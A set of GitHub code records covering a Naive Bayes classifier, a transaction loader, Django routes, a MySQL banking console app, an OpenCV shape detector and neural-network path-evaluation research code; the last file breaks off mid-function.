+{"seq_id":"18820906906","text":"import os\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\nfrom nltk.stem import PorterStemmer\nimport sys\nps = PorterStemmer()\n\ndef openDirectory(dirName):\n os.chdir(dirName)\n\nclass Process:\n stop_words = set(stopwords.words('english'))\n directories = ['comp.graphics/','misc.forsale/','rec.autos/','rec.motorcycles/','sci.space/']\n commonDirectoryPath1=sys.argv[1]\n commonDirectoryPath2=sys.argv[2]\n # commonDirectoryPath1 = 'C:/Users/MAITRI SHAH/Desktop/Studies/Utd/Sem1/ML/Assignment4/20news-bydate/20news-bydate-train/'\n # commonDirectoryPath2='C:/Users/MAITRI SHAH/Desktop/Studies/Utd/Sem1/ML/Assignment4/20news-bydate/20news-bydate-test/'\n def readAllFiles(self):\n uniqueWordsList1 = []\n classLabels1=[]\n for i in self.directories:\n pathForOsWalk = ''.join([self.commonDirectoryPath1,i])\n # print(pathForOsWalk)\n os.chdir(pathForOsWalk)\n #print(pathForOsWalk, \"reading has been started..... \")\n j = 1;\n for dirpath, dirname, files in os.walk(pathForOsWalk):\n for file in files:\n uniqueWordsList1.append(self.readSingleFile(file))\n classLabels1.append(i)\n j = j + 1\n #print(pathForOsWalk, \"reading finished..... \",i,\"Total filles read\")\n #print(uniqueWordsList1)\n uniqueWordsList2 = []\n classLabels2 = []\n for i in self.directories:\n pathForOsWalk = ''.join([self.commonDirectoryPath2, i])\n #print(pathForOsWalk)\n os.chdir(pathForOsWalk)\n # print(pathForOsWalk, \"reading has been started..... \")\n j = 1;\n for dirpath, dirname, files in os.walk(pathForOsWalk):\n for file in files:\n uniqueWordsList2.append(self.readSingleFile(file))\n classLabels2.append(i)\n j = j + 1\n #print(pathForOsWalk, \"reading finished..... \", i, \"Total filles read\")\n return uniqueWordsList1,classLabels1,uniqueWordsList2,classLabels2\n\n def readSingleFile(self,file):\n f = open(file,'r')\n uniqueWords = []\n filteredSentence = []\n finished = False\n for line in f:\n if line.startswith('Lines:') or line.startswith('Subject:') or line.startswith('Organization:'):\n finished = True\n if (line.startswith('From:') or line.startswith('Article-I.D.:') or line.startswith('Expires:') or line.startswith('Reply-To:')):\n finished = False\n if finished:\n words = word_tokenize(line)\n tokens = (e for e in words if e.isalpha())\n for w in tokens:\n if w not in self.stop_words:\n w=ps.stem(w)\n filteredSentence.append(w)\n if w not in uniqueWords:\n uniqueWords.append(w)\n\n f.close()\n return uniqueWords\n\n def theNaiveBayes(self,uniqueList1,classes1,uniqueList2,classes2):\n trainInstances=uniqueList1\n classLabels=classes1\n testInstances=uniqueList2\n testLabel=classes2\n\n def getUniqueFeatures(testInstance):\n return list(set(testInstance))\n\n def getClassLabels(classLabels):\n return list(set(classLabels))\n\n def getDictionarySize(trainInstances):\n uniqueLabelList = []\n for i in range(len(trainInstances)):\n uniqueLabelList = uniqueLabelList + trainInstances[i]\n\n uniqueLabelList = list(set(uniqueLabelList))\n size = (len(uniqueLabelList))\n return size\n\n def getCountOfFeatureInClass(featureValue, classLabel, trainInstances, classLabels):\n count = 0\n for i in range(len(classLabels)):\n if (classLabels[i] == classLabel):\n count = count + trainInstances[i].count(featureValue)\n return count\n\n def getTotalFeaturesInClass(classLabel, trainInstances, classLabels):\n count = 0\n for i in range(len(classLabels)):\n if (classLabels[i] == classLabel):\n count = count + len(trainInstances[i])\n return 
count\n\n def getPrior(classLabel, classLabels):\n total = len(classLabels)\n count = classLabels.count(classLabel)\n return float(count / total)\n\n uniqueFeatures = getUniqueFeatures(testInstances[0])\n\n uniqueClassLabels = getClassLabels(classLabels)\n\n conditionalProb = np.zeros((len(uniqueFeatures), len(uniqueClassLabels)))\n\n priorProb = np.zeros((len(uniqueClassLabels)))\n\n for i in range(len(uniqueClassLabels)):\n priorProb[i] = float(getPrior(uniqueClassLabels[i], classLabels))\n\n B = getDictionarySize(trainInstances)\n\n for i in range(len(uniqueFeatures)):\n for j in range(len(uniqueClassLabels)):\n conditionalProb[i][j] = (getCountOfFeatureInClass(uniqueFeatures[i], uniqueClassLabels[j],trainInstances, classLabels) + 1) / (getTotalFeaturesInClass(uniqueClassLabels[j], trainInstances, classLabels) + B)\n listProbResults = np.zeros((len(testInstances), len(uniqueClassLabels)))\n\n for m in range(len(testInstances)):\n for i in range(len(uniqueClassLabels)):\n listProbResults[m][i] = priorProb[i]\n for j in range(len(testInstances[m])):\n if(uniqueFeatures.__contains__(testInstances[m][j])):\n # if(conditionalProb.__contains__(uniqueFeatures.index(testInstances[m][j]))):\n listProbResults[m][i] = listProbResults[m][i] * conditionalProb[uniqueFeatures.index(testInstances[m][j])][i]\n #print(listProbResults[0][0],\" \",len(testLabel),\" \",len(uniqueClassLabels))\n counter = 0\n for j in range(len(listProbResults)):\n max = -1\n maxNumber=-1\n for i in range(len(uniqueClassLabels)):\n temp = listProbResults[j][i]\n if (temp > max):\n max = temp\n maxNumber = i\n # if(j==10):\n # #print(i,\" \",listProbResults[j][i])\n tempAns = uniqueClassLabels[maxNumber]\n # if(j==10):\n # print(tempAns,\" \",testLabel[j])\n if (tempAns == testLabel[j]):\n counter = counter + 1\n accuracy = counter / (len(testLabel))\n return accuracy\n\n''' ======================== MAIN FUNCTION ============================='''\nif __name__ == \"__main__\":\n pp = Process()\n uniqueWordList1,classLabel1,uniqueWordList2,classLabel2=pp.readAllFiles()\n accu=pp.theNaiveBayes(uniqueWordList1,classLabel1,uniqueWordList2,classLabel2)\n print(\"Accuracy\",(accu*100))","repo_name":"maitri2705/NaiveBayes","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25096402532","text":"import time\r\nimport pyodbc\r\nfrom src import *\r\n\r\ndef connect_db():\r\n # Строка подключения к БД\r\n cs = f'DRIVER={DRIVER_NAME};User={UID};Password={PWD};Database={DATABASE};Server={HOSTNAME};Port={PORT};'\r\n try:\r\n connect = pyodbc.connect(cs)\r\n print_log('База данных успешно подключена')\r\n return connect\r\n except Exception as error:\r\n print_log('При подключении к БД возникла ошибка:', True)\r\n print_log(error, True)\r\n exit(-1)\r\n\r\n\r\ndef run():\r\n last_filename = ''\r\n while True:\r\n file = get_last_file(last_filename) # Импортирование актуального эксель файла\r\n\r\n if file is not None:\r\n connect = connect_db() # Подключение к БД\r\n last_trans_id = max_trans_id(connect) # Получение последнего номера транзакции\r\n transactions_df = parsing_excel(file, last_trans_id) # Парсинг эксель файла\r\n if len(transactions_df) == 0:\r\n print_log('Новые транзакции не найдены')\r\n else:\r\n insert_data(transactions_df, connect) # Вставка данных в БД\r\n connect.close()\r\n print_log('Подключение к БД закрыто')\r\n last_filename = file.name\r\n time.sleep(15)\r\n\r\n\r\nif __name__ == '__main__':\r\n run()","repo_name":"arkiix/sberbank","sub_path":"Project/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37873469434","text":"from django.conf.urls import url\nfrom . import views\n\n\napp_name = 'signup'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^luck/$', views.luck, name='luck'),\n url(r'^disabled/$', views.disabled, name=\"disabled\"),\n]\n","repo_name":"atabekmad/signup4clinic","sub_path":"clinicsignup/apps/signup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30437881731","text":"'''\n\nScope of the project:\n\nImplementing a banking management system using Mysql.\n\n\nFeatures:\n\nMAIN MENU\n\n1. Insert Record/Records\n2. Display records as per account number\n a. Sorted as per account number\n b. Sorted as per customer Name\n c. Sorted as per Customer Balance\n3. Search record details as per the account number\n4. Update record\n5. Delete Record\n6. TransactionDebit/Withdraw from the account\n a.\tDebit/Withdraw from account\n b.\tCredit into account\n7. Exit\n\n\nStep by step procedures:\n\n•\t1 .Download MySQL\n\nDownload Xampp control panel and use phpmy admin as UI\n( port 3308 default 3306. But here 3306 already taken by mysql.so changed port to 3306)\n\n•\tSetting up password for root in phpMyAdmin\n\nClick admin, it will open phpMyAdmin. In user_accounts -edit privileages in 3 root ..>\ngive password ..> generate ..>Go\n\nIn local storage:\nXampp ..> phpMyAdmin..> config.inc.php\nAdd password b/w ‘ ’\nXampp ..> mysql ..>bin ..>my.ini\nAfter[mysql d]\nAdd one more line skip-grant-tables\n\n \n2.Setting up MySQLdb\n\nIt is an interface for connecting to a MySQL database server from python.\nFor that we have to install two packages\n1.\tmysql-connector-python (pip install mysql-connector-python)\n2.\tmysql-python (pip install mysql-python)\nnow import MySQLdb\n\n3. Create database -bankdb\n\n4. Create Table\n\nuser \n1.\tAccount_no\n2.\tName\n3.\tMobile number\n4.\tAddress\n5.\tcountry\n6.\tEmail\n7.\tAccount Balance\n\n\ntransactions\n\n1. trans_no\n2. trans_type (debit/credit)\n3. trans time Credit/debit datetime\n4. Account current balance\n5. Transaction amount\n6. user_id( foreign key of account no)\n\n5. write function for displaying menu\n\n6. if 1 then - create a new account.insert the data given into users db\n\n7. if 2 then display the sub menu and then use SELECT and ORDER query to show \nthe user in sorted way.\n\n8.search records as per account no- use SELECT and WHERE clause .Use pandas dataframe to view as table.\n\n9. Update account of the user - ask for account no --then choose what to updatw --Then use UPDATE clause\n\n10 . Delete account -ask for acc_no and use DELETE clause\n\n11.credit/credit - ask for credit or debit,amount - insert data into transactions db - update balance in users db\n\n12. 
display transactions -- SELECT from transaction table as per account no\n\n13.exit - create while loop --if select exit --exit the while loop --else continue displaying menu bar.\n\n'''\n\n\n\n\n\n\n# import MySQLdb -interface for connecting with sql database\n\nimport MySQLdb\nimport pandas as pd\n\n\n# connect to database\n\nconn=MySQLdb.connect(\n host=\"127.0.0.1\",\n user=\"root\",\n password=\"bhagya\",\n database=\"bankdb\",\n port=3308)\n\ncursor=conn.cursor()\n\n\n# Create Database\n\ndef create_db():\n\n cursor.excecute(\"CREATE DATABASE bankdb\")\n\n\n# create table\n\ndef create_table():\n \n cursor.execute(\"CREATE TABLE users (\\\n account_no INT NOT NULL AUTO_INCREMENT,\\\n Name VARCHAR(40) NOT NULL,\\\n Mobile_no VARCHAR(40) NOT NULL,\\\n Address VARCHAR(100) NOT NULL,\\\n Country VARCHAR(100) NOT NULL,\\\n Email VARCHAR(100) NOT NULL,\\\n Balance INT DEFAULT 0,\\\n PRIMARY KEY(account_no))\")\n\n cursor.execute(\"CREATE TABLE transactions (\\\n trans_no INT NOT NULL AUTO_INCREMENT,\\\n user_id INT,\\\n trans_type VARCHAR(40) NOT NULL,\\\n Trans_date TIMESTAMP DEFAULT current_timestamp,\\\n Trans_amount INT NOT NULL\\\n Current_balance INT NOT NULL,\\\n PRIMARY KEY(trans_no),\\\n FOREIGN KEY(user_id)\\\n REFERENCES users(account_no))\")\n\n#create_table()\n\n\ndef add_demodata():\n\n cursor.execute(\"INSERT INTO users(Name,Mobile_no,Address,Country,Email)\\\n VALUES('bhagya','5566778009','address city','india','bhagya@gmail.com'),\\\n ('bhavya','1166888009','add city','india','bhavya@gmail.com')\")\n conn.commit()\n\n#add_demodata()\n\n# Function to define - menu bar\n\n\ndef menu():\n print('*'*100)\n print('Welcome to Bank servives')\n print('1.Add account')\n print('2.Display users')\n print('3.Search records as per account no')\n print('4.Update records of user')\n print('5.Delete records of user')\n print('6.credit to /debit from account')\n print('7.show transactions')\n print('8.exit')\n print('*'*100)\n\n try:\n user_input=input(\"enter the no of services : \")\n return(user_input)\n except:\n print(\"invalid input\")\n\n\ndef sub_menu():\n print('a. sorted as per account no')\n print('b. sorted as per customer Name')\n print('c. sorted as per customer balnce')\n print('d. 
back to menu')\n print('*'*100)\n try:\n sub_input=input(\"enter any options listed : \")\n return sub_input\n except:\n print(\"invalid input\")\n\n\n\ndef add_account():\n try:\n \n print('*'*100)\n print(\"enter your details to create account!\")\n name=input(\"enter your name : \")\n mobile=input(\"enter your mobile no : \")\n address=input(\"enter your address : \")\n country=input(\"enter your country : \")\n email=input(\"enter your email : \")\n records=[]\n records.append(name)\n records.append(mobile)\n records.append(address)\n records.append(country)\n records.append(email)\n\n\n print(records)\n cursor.execute(\"INSERT INTO users(Name,Mobile_no,Address,Country,Email)\\\n VALUES(%s,%s,%s,%s,%s)\",records)\n conn.commit()\n print('Account created successfully!')\n print('*'*100)\n except:\n print(\"invalid input\")\n\n\ndef display_records(sort_by):\n\n try:\n cursor.execute(\"SELECT * FROM users ORDER BY {}\".format(sort_by))\n data=cursor.fetchall()\n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # to_string() prints every column; otherwise pandas truncates the display\n print('='*100)\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n \n \ndef search_records(search_by):\n\n try: \n cursor.execute(\"SELECT * FROM users WHERE account_no={} \".format(search_by))\n data=cursor.fetchall()\n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # to_string() prints every column; otherwise pandas truncates the display\n print('='*100)\n else:\n print(\"no records found!\")\n except:\n print(\"invalid input\")\n \n \ndef update_records(acc_no,update_by,set_inp):\n\n try:\n \n cursor.execute(\"UPDATE users SET {}='{}' WHERE account_no={}\".format(update_by,set_inp,acc_no)) # string values must be quoted in SQL\n conn.commit()\n cursor.execute(\"SELECT * FROM users WHERE account_no={} \".format(acc_no))\n data=cursor.fetchall()\n if len(data)!=0 :\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # to_string() prints every column; otherwise pandas truncates the display\n print('='*100)\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n\n \n\ndef delete_record(acc_no):\n try:\n cursor.execute(\"DELETE FROM users WHERE account_no=%s\",(acc_no,))\n conn.commit()\n \n if cursor.rowcount!=0:\n print(cursor.rowcount,\"record(s) deleted successfully!\")\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n\n \n\ndef trans_record(acc_no,trans_type,trans_amt):\n \n try:\n cursor.execute(\"SELECT Balance FROM users WHERE account_no={} \".format(acc_no))\n data=cursor.fetchall()\n\n if(len(data)!=0):\n balance=data[0][0]\n if trans_type==\"debit\":\n curr_balance=balance-trans_amt\n elif trans_type==\"credit\":\n curr_balance=balance+trans_amt\n\n if curr_balance>0:\n \n cursor.execute(\"INSERT INTO transactions(user_id,trans_type,Trans_amount,Current_balance)\\\n VALUES({},'{}',{},{})\".format(acc_no,trans_type,trans_amt,curr_balance))\n conn.commit()\n \n\n cursor.execute(\"UPDATE users SET Balance={} WHERE account_no={}\".format(curr_balance,acc_no))\n conn.commit()\n\n print(\" Transaction done successfully! Current balance is {}\".format(curr_balance))\n\n 
else:\n print(\"insufficient balance\")\n else:\n print(\"No records found\")\n \n except:\n print(\"invalid input\")\n\n \ndef display_trans(search_by):\n\n try: \n cursor.execute(\"SELECT * FROM transactions WHERE user_id={} \".format(search_by))\n data=cursor.fetchall()\n \n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['trans_id','Account no','type','Date','current balance','trans_amount'])\n print(df.to_string()) # to_string() prints every column; otherwise pandas truncates the display\n print('='*100)\n else:\n print(\"No records found\")\n except:\n print(\"invalid input\")\n\n\n#===========================call functions according to user input=========================\n \nloop=True\nwhile loop:\n \n user_input=menu()\n print(user_input)\n\n # create account\n if user_input=='1':\n add_account()\n\n # display record\n if user_input=='2':\n sub_input=sub_menu()\n\n if sub_input=='a':\n display_records('account_no')\n\n if sub_input=='b':\n display_records('Name')\n\n if sub_input=='c':\n display_records('Balance')\n\n # search by account no \n if user_input=='3':\n acc_inp=input(\"enter the account no : \")\n search_records(int(acc_inp))\n \n\n # update user record \n if user_input=='4':\n acc_inp=input(\"enter the account no : \")\n print(\"enter the record you want to edit\")\n print(\"1.Name\")\n print(\"2.Mobile_no\")\n print(\"3.Address\")\n print(\"4.Email\")\n print(\"5.Country\")\n \n up_inp=input(\"enter the category : \")\n if up_inp=='1':\n update_by='Name'\n elif up_inp=='2':\n update_by='Mobile_no'\n elif up_inp=='3':\n update_by='Address'\n elif up_inp=='4':\n update_by='Email'\n elif up_inp=='5':\n update_by='Country'\n else:\n print(\"invalid option\")\n continue\n\n set_inp=str(input(\"enter the new value : \"))\n update_records(int(acc_inp),update_by,set_inp)\n\n\n # delete the user record\n\n if user_input=='5':\n acc_inp=input(\"enter the account no : \")\n delete_record(acc_inp)\n \n \n # Credit or debit into account\n\n if user_input=='6':\n acc_inp=input(\"enter the account no : \")\n or_inp=input(\" choose\\\n a. credit\\\n b. debit : \")\n if or_inp=='a':\n trans_type=\"credit\"\n elif or_inp=='b':\n trans_type=\"debit\"\n else:\n print(\"invalid option\")\n continue\n\n trans_amt=input(\"enter the amount : \")\n\n trans_record(acc_inp,trans_type,int(trans_amt))\n \n # display transactions\n\n if user_input=='7':\n acc_inp=input(\"enter the account no : \")\n display_trans(acc_inp)\n\n \n # exit loop\n \n if user_input=='8':\n loop=False\n print(\"exiting.................\") \n \n\n \n\n\n\n \n\n\n","repo_name":"Bhagyasree-dhanil/Database-projects","sub_path":"Banking_management_sql.py","file_name":"Banking_management_sql.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
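The banking script above builds most of its SQL with str.format, which is open to SQL injection. Driver placeholders (%s in mysql.connector) can bind values, but identifiers such as an ORDER BY column cannot be bound, so they need a whitelist check instead. A minimal sketch, assuming a mysql.connector-style cursor; ALLOWED_SORT_COLUMNS and the function names are illustrative, not part of the original script:

# Sketch: bind values with placeholders, whitelist identifiers (assumed mysql.connector paramstyle).
ALLOWED_SORT_COLUMNS = {"account_no", "Name", "Balance"}  # illustrative whitelist

def display_records_safe(cursor, sort_by):
    if sort_by not in ALLOWED_SORT_COLUMNS:          # identifiers cannot be bound as %s,
        raise ValueError("unsupported sort column")  # so validate before formatting
    cursor.execute("SELECT * FROM users ORDER BY {}".format(sort_by))
    return cursor.fetchall()

def search_records_safe(cursor, account_no):
    # the value is bound by the driver, never spliced into the SQL string
    cursor.execute("SELECT * FROM users WHERE account_no=%s", (account_no,))
    return cursor.fetchall()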
+{"seq_id":"19879432669","text":"#!/usr/bin/python3.5\n\nfrom shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom time import sleep\n\n\ndef auto_canny(image, sigma=0.95):\n\t# compute the median of the single channel pixel intensities\n\tv = np.median(image)\n \n\t# apply automatic Canny edge detection using the computed median\n\tlower = int(max(0, (1.0 - sigma) * v))\n\tupper = int(min(255, (1.0 + sigma) * v))\n\tedged = cv2.Canny(image, lower, upper)\n \n\t# return the edged image\n\treturn edged\n\n\n\n\nif __name__ == \"__main__\":\n\tvideo = cv2.VideoCapture('Video_sample.mp4')\n\n\n\twhile(video.isOpened()):\n\t\tret, img = video.read()\n\t\tmask = np.zeros_like(img)\n\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tgray = cv2.equalizeHist(gray)\n\n\t\tthresh = cv2.threshold(gray, 25, 255, cv2.THRESH_BINARY)[1]\n\t\tedge = auto_canny(thresh)\n\n\t\t(_, cnts, _) = cv2.findContours(edge.copy(), cv2.RETR_EXTERNAL,\n\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\n\t\tfor c in cnts:\n\t\t\t# compute the center of the contour, then detect the name of the\n\t\t\t# shape using only the contour\n\t\t\tM = cv2.moments(c)\n\n\t\t\tif M['m00'] != 0:\n\t\t\t\tcx = int(M['m10']/M['m00'])\n\t\t\t\tcy = int(M['m01']/M['m00'])\n\t\t\t\tarea = cv2.contourArea(c)\n\n\t\t\t\tif (32 1:\n x -= 1\n\nprint(total)","repo_name":"lanhhoang/big-o","sub_path":"week-02/day-03/homework/439_devu_the_dumb_guy.py","file_name":"439_devu_the_dumb_guy.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12275480545","text":"import copy\nimport utils\nimport torch\nimport torch.nn as nn\nfrom models.classifiers import RandomSamplerParallel, MultiLinear\nimport numpy as np\nimport random\nimport pandas as pd\nimport seaborn as sns\nimport os\nimport matplotlib.pyplot as plt\nimport argparse\n\nclass Path(object):\n\n def __init__(self, model):\n\n \"\"\"\n Init the path from a given model (simply coy the architecutre)\n \"\"\"\n\n self.model = copy.deepcopy(model)\n self.points = []\n self.reverse = False\n\n @property\n def step(self):\n\n return 1 if not self.reverse else -1\n\n def append(self, solution):\n \"\"\"\n Sparsify the solution found by the subnetwork procedure\n Solution is a FCN Classifier\n \"\"\"\n if type(solution) is not tuple:\n solution = (solution,)\n\n self.points.append(tuple(torch.nn.utils.parameters_to_vector(s.parameters()) for s in solution[::self.step]))\n\n pass\n\n def extend(self, other):\n\n assert (not self.reverse)\n self.points.extend(other.points[::other.step])\n\n def connect(self):\n \"\"\"Connect the last two sparsified solutions\"\"\"\n pass\n\ndef eval_path(path, sizes, dirname):\n\n global device\n os.makedirs(dirname, exist_ok=True)\n param_B = path.points[0][0]\n A = copy.deepcopy(path.model).requires_grad_(False)\n AB = copy.deepcopy(path.model).requires_grad_(False)\n B = copy.deepcopy(path.model).requires_grad_(False)\n # nn.utils.vector_to_parameters(param_B, B.parameters())\n A.to(device)\n AB.to(device)\n B.to(device)\n K = 11\n lbdas = np.arange(1, K) / (K-1)\n index = pd.MultiIndex.from_product([range(len(path.points)), range(0, K-1)], names=[\"point\", \"t\"])\n stats = ['loss', 'error']\n sets = [\"train\", \"test\"]\n names=['set', 'stat', 'try']\n tries = [1]\n columns=pd.MultiIndex.from_product([sets, stats, tries], names=names)\n stats = pd.DataFrame(index=index, columns=columns)\n reverse = False\n # A = None\n # for\n\n for idx, pt in enumerate(path.points):\n # pt is a tuple\n\n if len(pt) == 1:\n param_A = pt[0].to(device)\n nn.utils.vector_to_parameters(param_A, model.parameters()) # param_A from previous iteration\n # print(f\"error: {err}, loss: {loss}\")\n # if idx == 0:\n loss, err = eval_epoch(model, train_loader)\n loss_test, err_test = eval_epoch(model, test_loader)\n stats.loc[(idx), 0] = loss, err, loss_test, err_test # consider the index of the path at K-1 as the new point\n\n continue\n elif len(pt) == 2:\n # len(pt) == 2\n # the point is (B,C)\n # have to create intermediate point AB and walk from AB to B\n if not reverse:\n param_B = pt[0].to(device)\n # param_AB = copy.copy(A) # from the previous iterations\n # param_A = pt[1]\n\n nn.utils.vector_to_parameters(param_A, A.parameters()) # param_A from previous iteration\n nn.utils.vector_to_parameters(param_B, AB.parameters()) # param_B from this iteration\n nn.utils.vector_to_parameters(param_B, B.parameters()) # param_B from this iteration\n # nn.\n AB.main[-1].weight.data = A.main[-1].weight.data\n AB.main[-1].bias.data = A.main[-1].bias.data\n param_AB = nn.utils.parameters_to_vector(AB.parameters()).to(device)\n param_A = pt[1].to(device) # next starting point\n else:\n # reverse mode, fetch the next point\n # reverse role of AB and B, load A with next point\n\n param_AB = pt[1].to(device)\n param_A = path.points[idx+1][0].to(device) # the next point\n nn.utils.vector_to_parameters(param_A, A.parameters()) # param_A from previous iteration\n nn.utils.vector_to_parameters(param_AB, AB.parameters()) # param_B from this iteration\n 
nn.utils.vector_to_parameters(param_AB, B.parameters())  # param_AB from this iteration\n\n                B.main[-1].weight.data = A.main[-1].weight.data\n                B.main[-1].bias.data = A.main[-1].bias.data\n            # else:  # first point\n            param_B = nn.utils.parameters_to_vector(B.parameters()).to(device)\n            # B = pt\n\n        elif len(pt) == 3:\n            # at this point the last state of A is the model at the\n            # junction between the two paths\n            reverse = True\n            param_A = pt[0].to(device)\n            param_B = pt[1].to(device)\n            param_C = pt[2].to(device)\n\n            nn.utils.vector_to_parameters(param_A, A.parameters())\n            nn.utils.vector_to_parameters(param_B, AB.parameters())\n\n            # nn.utils.vector_to_parameters(param_C, C.parameters())\n            AB.main[-1].weight.data = A.main[-1].weight.data\n            AB.main[-1].bias.data = A.main[-1].bias.data\n            param_AB = nn.utils.parameters_to_vector(AB.parameters()).to(device)\n            param_A = param_C\n\n            # BC.main[-1].weight = C.main[-1].weight\n            # BC.main[-1].bias = C.main[-1].bias\n        for tidx, t in enumerate(lbdas, 1):\n            pt = (1-t) * param_AB + t * param_B\n            nn.utils.vector_to_parameters(pt, model.parameters())\n            loss, err = eval_epoch(model, train_loader)\n            loss_test, err_test = eval_epoch(model, test_loader)\n            # print(f\"error: {err}, loss: {loss}\")\n            stats.loc[(idx-1+tidx//(K-1), tidx%(K-1))] = loss, err, loss_test, err_test  # consider the index of the path at K-1 as the new point\n            # stats.loc[(idx-1+tidx//(K-1), tidx%(K-1))] = loss_test, err_test  # consider the index of the path at K-1 as the new point\n\n    # model.to(torch.device('cpu'))\n    return stats\n\ndef plot_path(stats, quant_ds, quant_ref, dirname):\n    # df_plot = pd.melt(stats.reset_index(), id_vars=[\"point\", \"t\"], ignore_index=False)\n    Idx = pd.IndexSlice\n    # df_plot.index.name = \"index\"\n    for setn in [\"train\", \"test\"]:\n        for stat in [\"loss\", \"error\"]:\n            # df_plot = stats.loc[:, Idx[stat, :]].reset_index()\n            ax = stats.plot(kind=\"line\",\n            # sns.lineplot(\n                # data=df_plot,\n                y=(setn,stat)\n            )\n            # )\n            ax.axline((0,quant_ref[stat, setn]), (1, quant_ref[stat, setn]), ls=\":\", zorder=2, c='g')\n            ax.axline((0,quant_ds[stat, setn]), (1, quant_ds[stat, setn]), ls=\":\", zorder=2, c='r')\n\n            plt.savefig(fname=os.path.join(dirname, f'path_{setn}_{stat}.pdf'), bbox_inches=\"tight\")\n    stats.to_csv(os.path.join(dirname, f'path.csv'))\n    plt.close(\"all\")\n\n\n\ndef read_csv(fname):\n    stats = pd.read_csv(fname, header=[0,1,2], index_col=[0,1])\n    stat_idx = stats.columns.names.index(\"stat\")\n    nlevels = stats.columns.nlevels\n    if \"err\" in stats.columns.get_level_values(\"stat\"):\n        new_stat_lvl = [s.replace(\"err\", \"error\") for s in stats.columns.get_level_values(stat_idx)]\n        # new_stat.sort()\n        levels = [stats.columns.get_level_values(i) if i != stat_idx else new_stat_lvl for i in range(nlevels)]\n        cols = pd.MultiIndex.from_arrays(levels, names=stats.columns.names)\n        stats.columns = cols\n        stats.to_csv(fname)\n\n    return stats\n\n\n\n\n\n\n\"\"\"\nComplement of a permutation with total number of elements\n\"\"\"\ndef complement_perm(perm, total):\n    idx = 0\n    cperm= []\n    i = 0\n    while idx < total:\n        while i 0 else 0\n    device = torch.device('cuda' if use_cuda else 'cpu', gpu_index)\n\n    fn_log_model = os.path.join(os.path.dirname(args.M1), 'logs.txt')\n    archi_model = utils.parse_archi(fn_log_model)\n    fn_model = args.M1\n    chkpt_model = torch.load(fn_model, map_location=lambda storage, location: storage)\n    model = copy.deepcopy(utils.construct_FCN(archi_model))\n    path = Path(model)\n    args_model = chkpt_model[\"args\"]\n    # args_model = chkpt_model[\"args\"]\n    
# model.requires_grad_(False)\n # selsol =model\n # path.extend(selsol)\n n_layer = utils.count_hidden_layers(model)\n ntry = 1\n\n imresize=None\n train_dataset, test_dataset, num_chs = utils.get_dataset(dataset=args_model.dataset,\n dataroot=args_model.dataroot,\n imresize =imresize,\n normalize= args_model.normalize if hasattr(args_model, 'normalize') else False,\n )\n # print('Transform: {}'.format(train_dataset.transform), file=logs, flush=True)\n train_loader, size_train,\\\n test_loader, size_test = utils.get_dataloader( train_dataset,\n test_dataset, batch_size\n =args_model.batch_size,\n size_max=100, #args_model.size_max,\n collate_fn=None,\n pin_memory=True)\n paths = dict()\n models = dict()\n quant_ref = pd.DataFrame()\n quant_ds = pd.DataFrame()\n Idx = pd.IndexSlice\n for mid, fn_model in enumerate([args.M1, args.M2], 1):\n\n models[mid] = copy.deepcopy(utils.construct_FCN(archi_model)) # copy the model\n model = models[mid]\n dir_model = os.path.dirname(fn_model)\n dir_expA = os.path.join(dir_model, args.nameA) # the directories of the experiments\n dir_expB = os.path.join(dir_model, args.nameB)\n\n fn_ds = os.path.join(dir_expB, \"eval_copy.pth\") # the filename for the experiment B\n chkpt_ds = torch.load(fn_ds, map_location=lambda storage, loc: storage)\n quant = chkpt_ds[\"quant\"]\n quant_ref = pd.concat([quant_ref, quant.loc[1, Idx[0, :, :]].to_frame().transpose()], ignore_index=True, axis=0)\n idx_max = quant.loc[:, Idx[1:, \"loss\", \"train\"]].idxmax(axis=1)\n idx_ds = quant[idx_max].idxmin()\n quant_ds = pd.concat([quant_ds, quant.loc[idx_ds[1][0], Idx[idx_ds.keys()[1][0], :, :]].to_frame().transpose()], ignore_index=True, axis=0) # select the step and the layer that define the bound\n chkpt_model = torch.load(fn_model, map_location=lambda storage, loc: storage)\n model.load_state_dict(chkpt_model['model'])\n paths[mid] = Path(model)\n path = paths[mid]\n path.reverse = mid == 2\n path.append(model) # first points\n # args_model = chkpt_model[\"args\"]\n model.requires_grad_(False)\n for eid in range(n_layer, -1, -1):\n fn_log_sol = os.path.join(dir_expA, f\"logs_entry_{eid}.txt\")\n fn_solution = os.path.join(dir_expA, f\"checkpoint_entry_{eid}.pth\")\n chkpt = torch.load(fn_solution, map_location=lambda storage, loc: storage)\n archi_sol = utils.parse_archi(fn_log_sol)\n solution = utils.construct_classifier(archi_sol)\n solution.load_state_dict(chkpt['classifier'])\n solution.requires_grad_(False)\n # eval_epoch(solution, 